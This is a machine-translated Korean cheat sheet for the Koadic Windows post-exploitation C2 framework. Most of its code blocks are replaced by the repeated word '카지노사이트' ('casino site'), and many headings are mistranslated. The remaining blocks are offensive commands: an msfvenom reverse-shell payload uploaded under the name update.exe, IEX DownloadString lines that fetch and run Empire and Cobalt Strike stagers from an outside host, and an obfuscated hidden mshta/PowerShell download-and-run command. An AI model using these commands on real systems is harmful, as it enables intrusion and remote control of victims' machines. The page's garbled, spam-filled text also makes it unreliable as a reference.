Koadic C2 프레임 워크 열 시트

All 모든 명령 복사 < PDF 생성

제품정보

Koadic은 명령 및 제어 작업을 위한 COM (Component Object Model) 개체를 레버리지하는 Windows 포스트 폭발 프레임 워크입니다. 파이썬에 내장 된 Koadic은 Windows 구성 요소 및 JavaScript 실행을 사용하여 생활 오프-랜드 기술에 중점을두고 지속성을 유지하고 포괄적 인 포스트 폭발 기능을 제공하는 동안 탐지를 방지합니다.

· ** 보증**: 이 도구는 공인 된 침투 테스트 및 빨간색 팀 운동에만 사용됩니다. 모든 대상에 대해 사용하기 전에 적절한 권한이 있습니다.

설치하기

자주 묻는 질문

카지노사이트

GitHub에서 설치

카지노사이트

Docker 설치

카지노사이트

Kali Linux 설치

카지노사이트

기본 사용

Koadic 시작하기

카지노사이트

명령 선 공용영역

카지노사이트

기본 명령

카지노사이트

단계 및 임플란트

MSHTA 스테퍼

카지노사이트

Rundll32 댄서

카지노사이트

Regsvr32 댄서

카지노사이트

WScript 댄서

ο 회원 관리

PowerShell 댄서

카지노사이트

좀비 관리

기본 Zombie 명령

카지노사이트

좀비 상호 작용

카지노사이트

Multi-Zombie 운영

카지노사이트

Implant 단위

시스템 정보

카지노사이트

Credential 수확

카지노사이트

Persistence 기계장치

카지노사이트

옆 운동

카지노사이트

Privilege 확장

오프화이트

네트워크 운영

카지노사이트

파일 작업

오프화이트

고급 기능

Pivoting 및 터널링

카지노사이트

Keylogging 및 스크린 캡처

카지노사이트

자료 Exfiltration

카지노사이트

자동화 및 스크립트

Python 자동화 스크립트

카지노사이트

PowerShell 자동화

카지노사이트

Bash 자동화 스크립트

카지노사이트

다른 도구와 통합

Metasploit 통합

```bash

Use Koadic for initial access, pivot to Metasploit

Generate Metasploit payload

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=8443 -f exe -o meterpreter.exe

Upload via Koadic zombie

use implant/manage/upload set ZOMBIE [zombie_id] set LPATH ./meterpreter.exe set RPATH C:\Windows\Temp\update.exe run

Execute Metasploit payload

zombie [zombie_id] cmd "C:\Windows\Temp\update.exe"

Handle in Metasploit

msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_https set LHOST 192.168.1.100 set LPORT 8443 run ```의 경우

Empire 통합

```bash

Generate Empire stager

Use Koadic for initial access, pivot to Empire

From Koadic zombie

zombie [zombie_id] shell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/empire_stager.ps1')"

Handle in Empire

./empire listeners uselistener http set Host 192.168.1.100 set Port 8080 execute ```에 대하여

Cobalt Strike 통합

```bash

Beacon integration

Generate Cobalt Strike beacon

Use Koadic for initial access, pivot to Beacon

From Koadic zombie

zombie [zombie_id] shell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/beacon.ps1')"

Handle in Cobalt Strike team server

```의 경우

운영 보안

통신 보안

```bash

Use HTTPS with valid certificates

Configure domain fronting

Implement certificate pinning

Use legitimate user agents

Example HTTPS configuration

Generate SSL certificates

openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes

Configure Koadic with SSL (if supported)

Use reverse proxy with SSL termination

```에 대하여

교통 의무

```bash

Use legitimate Windows binaries

Implement jitter and delays

Mimic legitimate traffic patterns

Use common ports and protocols

Example obfuscated execution

mshta.exe vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command """"& \{Start-Sleep -Seconds (Get-Random -Minimum 5 -Maximum 30); IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100:9999/sales')\}"""", 0, False")(window.close) ```의 경우

안티 포렌식

카지노사이트

문제 해결

일반적인 문제

카지노사이트

Debug 모드

카지노사이트

최고의 연습

운영 계획

1. Pre-engagement 설정: 참여하기 전에 단계와 청취자를 구성
2. ** 좀비 관리 **: descriptive zombie 이름과 네트워크 구성
3. 통신 프로토콜: 보안 C2 통신 채널 구축
4. ** 데이터 처리**: 안전한 데이터 수집 및 저장
5. 명세 ** 청소 절차 **: artifact 제거 및 zombie 정리 계획

보안 고려 사항

카지노사이트

문서 및 보고

카지노사이트

지원하다

• Koadic GitHub 저장소
• 고용 문서
• 더 랜드 배틀
• MITRE ATT&CK; 프레임워크
• SANS 레드 팀 운영

---

이 속임수 시트는 Koadic C2 프레임 워크를 사용하여 포괄적 인 참조를 제공합니다. 항상 적색 팀 운영 또는 침투 테스트를 수행하기 전에 적절한 승인이 있습니다. 필수